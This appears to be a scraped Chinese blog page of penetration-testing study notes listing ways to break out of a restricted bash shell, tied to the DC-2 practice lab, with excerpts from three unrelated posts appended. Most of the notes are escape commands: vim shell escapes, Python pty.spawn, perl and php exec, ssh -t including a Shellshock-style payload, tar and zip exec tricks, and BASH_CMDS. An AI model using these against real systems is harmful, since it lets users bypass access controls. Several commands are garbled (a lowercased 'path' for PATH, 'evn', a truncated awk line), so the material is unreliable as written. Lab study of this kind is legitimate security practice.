1.什麼是rbash
2.如何設定乙個rbash
cp /bin/bash /bin/rbash # 複製乙個bash,重新命名為rbash
useradd -s /bin/rbash test
# 設定使用者test登陸的shell為rbash
mkdir -p /home/test/.bin # 在test使用者下新建乙個.bin目錄存放可以執行的命令
1.檢查可用的命令
2.檢查可用的操作符
>
>>
<
| 等
3.root身份可以執行的命令
sudo -l # sudo應該也會被禁用
4.檢查shell
echo
$shell
# 基本都是/bin/rbash
5.檢查可用的程式語言
python perl ruby 等
6.檢查環境變數
執行:evn/printenv
1.「/」字元被允許了
2.cp命令被允許
cp /bin/bash test1
cp /bin/sh test2
./test1 # 切換到了/bin/bash
./test2 # 切換到了/bin/sh
3.常見應用
探測系統中是否存在常見應用
man/git
vi/vim
> vim test
:!/bin/sh # 利用在vi/vim中可以執行命令的特點
>
more
test
!/bin/sh # 同樣也是利用開啟檔案後可以在下面執行命令的特點
4、set shell(dc-2靶機使用它成功了)
# vim/vi進入之後
:set shell=/bin/sh # 或者用/bin/bash
:shell
# 切換完成之後還要新增環境變數。給$path變數增加兩個路徑,用來查詢命令
export path=
$path:/bin/
export path=
$path:/usr/bin/
5.更改path或shell環境變數
6.程式語言
python -c "import os;os.system('/bin/bash')"
或者python -c "import pty;pty.spawn('/bin/bash')"
php -a then exec(
"sh -i"
)
perl -e "exec '/bin/sh';"
os.execute(
'/bin/sh'
)
exec
"/bin/sh"
7.其他可以嘗試的方法
ssh username@ip -t "/bin/sh" or "/bin/bash"
ssh username@ip -t "bash --noprofile"
ssh username@ip -t "() ; /bin/bash"
(sehllshock)
ssh -o proxycommand=
"sh -c /tmp/yourfile.sh" 127.0.0.1 (suid)
zip /tmp/test.zip /tmp/test -t --unzip-command=
"sh -c /bin/bash"
tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash
awk
'begin '
8、另類方法(dc-2靶機使用它成功了)
# 利用bash_cmds自定義乙個shell
bash_cmds[a]
=/bin/sh;a
# 新增環境變數
export path=
$path:/bin/
export path=
$path:/usr/bin
滲透測試學習筆記 初識滲透測試
黑客活動 hacking 道德黑客 ethical hacking 白帽黑客 white hat hacking poc proof of concept,概念證明。pt penetration testing或者pen testing,滲透測試。apt advanced package tool,...
滲透測試 SSH
安全shell ssh 服務提供了對unix和windows系統的加密訪問,通過ssh可以進行命令列shell訪問 檔案訪問與安全ftp 以及簡單的vpn服務。由於使用明文的服務 如telnet 存在的弱點經常會被攻擊者利用來突破網路,所以ssh應運而生,主要用於實現對伺服器的加密訪問,以達到安全地...
滲透測試 Wget
第一次接觸到wget這個指令是在 網路安全評估 一書中的第179頁 wget r m nv 常用引數 m,mirror 等價於 r n l inf nr.nv,non verbose 關掉冗長模式,但不是安靜模式 a,accept list 可以接受的檔案型別 r,reject list 拒絕接受的...